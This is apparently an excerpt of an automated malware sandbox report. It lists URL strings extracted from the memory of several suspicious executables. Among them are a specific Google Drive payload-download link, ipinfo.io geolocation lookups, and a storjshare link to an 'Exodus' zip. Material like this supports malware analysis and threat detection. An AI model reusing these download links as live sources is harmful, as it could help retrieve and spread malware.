                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
                        Source: dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google-
                        Source: t5abhIx.exe, 0000002B.00000003.269667407590.000001B3EE927000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664399362.000001B3EE8CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                        Source: dwVrTdy.exe, 00000028.00000003.269595629729.0000025635684000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/$&
                        Source: dwVrTdy.exe, 00000026.00000002.269640823894.000002243263F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/)
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_app
                        Source: dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594516522.0000025635613000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593756240.000002563560F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593816907.0000025635612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_app$
                        Source: t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_app16B86B2
                        Source: AzVRM7c.exe, 00000029.00000003.269622635511.00000247ADF4E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622388301.00000247ADF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_app891A5BF2880
                        Source: AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appB
                        Source: dwVrTdy.exe, 00000026.00000003.269575586601.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576905982.000002243264E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576407552.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576867431.000002243264B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575988391.0000022432649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appC86DD1F748C
                        Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620990445.00000247ADECF000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADED7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_apprxn
                        Source: dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575586601.000002243263F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575367638.0000022432639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appym
                        Source: AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/H
                        Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/U5
                        Source: dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/sett)W~
                        Source: dwVrTdy.exe, 00000026.00000003.269575949118.000002243262B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575735102.000002243262A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settC
                        Source: t5abhIx.exe, 0000002B.00000003.269665082563.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665572717.000001B3EE8E2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settings
                        Source: dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settings0A80DFEA
                        Source: dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settings8
                        Source: dwVrTdy.exe, 00000026.00000003.269575586601.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576905982.000002243264E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576407552.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576867431.000002243264B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575988391.0000022432649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settings8ECA8A0F77F0
                        Source: AzVRM7c.exe, 00000029.00000003.269622635511.00000247ADF4E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622388301.00000247ADF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settings9E35DD14
                        Source: t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settingsFA82C2BF0FBE
                        Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620990445.00000247ADECF000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADED7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settingsV
                        Source: t5abhIx.exe, 0000002B.00000003.269665781497.000001B3EE8E8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665572717.000001B3EE8E2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settingsXn
                        Source: AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settingscrxv
                        Source: dwVrTdy.exe, 00000026.00000002.269640823894.000002243263F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/e
                        Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/eo
                        Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/j
                        Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666253189.000001B3EE8D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/keP_=
                        Source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://drive.google.com/uc?id=
                        Source: dwVrTdy.exe, 00000028.00000003.269647087096.00000256355FD000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                        Source: dwVrTdy.exe, 00000028.00000002.269664887145.00000256355C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download$
                        Source: dwVrTdy.exe, 00000028.00000003.269648294839.000002563562B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647448956.000002563562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download6
                        Source: dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadChrome
                        Source: dwVrTdy.exe, 00000028.00000002.269664887145.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635676000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadJ6
                        Source: dwVrTdy.exe, 00000028.00000002.269664887145.00000256355E6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.00000256355FD000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647087096.00000256355FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download_
                        Source: dwVrTdy.exe, 00000026.00000003.269622533253.00000224326C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadd
                        Source: dwVrTdy.exe, 00000028.00000002.269666025995.0000025636270000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647817237.0000025636294000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648674798.0000025636294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadom
                        Source: dwVrTdy.exe, 00000026.00000002.269640823894.00000224326C6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269622533253.00000224326C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download~
                        Source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://drive.google.com/uc?id=URL:
                        Source: dwVrTdy.exe, 00000028.00000003.269648294839.000002563562B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647448956.000002563562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/x
                        Source: dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/y#
                        Source: dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                        Source: dwVrTdy.exe, 00000028.00000002.269664887145.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635676000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/61
                        Source: dwVrTdy.exe, 00000028.00000003.269646928475.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647817237.0000025636294000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635689000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648674798.0000025636294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                        Source: dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269622533253.000002243266F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download-
                        Source: dwVrTdy.exe, 00000026.00000002.269641953537.000002243431F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download8b
                        Source: dwVrTdy.exe, 00000028.00000003.269646928475.0000025635692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadF
                        Source: dwVrTdy.exe, 00000028.00000002.269664887145.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635676000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/x1
                        Source: b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570364935.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                        Source: LoaderClient.exe, 0000002F.00000002.269881633471.00000178EAAA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/astral-sh/ruff
                        Source: LoaderClient.exe, 0000002F.00000002.269881633471.00000178EAAA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
                        Source: LoaderClient.exe, 0000002E.00000003.269796231674.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269798029799.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269801549924.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269785646619.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269802137570.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269801841133.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269801841133.0000023A40635000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269895531489.00007FFBBB6A4000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
                        Source: LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
                        Source: LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel
                        Source: LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel/issues
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues
                        Source: LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269875318381.00000178EAE7C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269871977181.00000178EAE78000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883457246.00000178EAE80000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269884153645.00000178EAFAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                        Source: LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269842260998.00000178EA7A4000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269855123634.00000178EA839000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869399143.00000178EA34D000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269853706417.00000178EA836000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850268830.00000178EA833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                        Source: LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                        Source: LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869753931.00000178EAE5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
                        Source: dwVrTdy.exe, 00000026.00000002.269640823894.0000022432619000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635629000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF08000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8C8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F0753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
                        Source: dwVrTdy.exe, 00000028.00000002.269664887145.00000256355E6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.00000256355FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Q
                        Source: dwVrTdy.exe, 00000028.00000002.269664887145.00000256355E6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.00000256355FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/f
                        Source: t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8A7000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE95F000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://ipinfo.io/json
                        Source: dwVrTdy.exe, 00000026.00000002.269641953537.000002243431F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json2
                        Source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://ipinfo.io/jsonN/Aipcountry
                        Source: AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADE96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonR
                        Source: t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F0750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonV
                        Source: dwVrTdy.exe, 00000028.00000002.269666025995.00000256362A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json_
                        Source: AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonb
                        Source: t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsoniaF840sQB
                        Source: t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F0750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonn
                        Source: AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADE96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonr
                        Source: dwVrTdy.exe, 00000026.00000002.269641953537.000002243431F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635668000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF08000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F076F000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269673467025.000001B3F076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/missingauth
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
                        Source: t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d
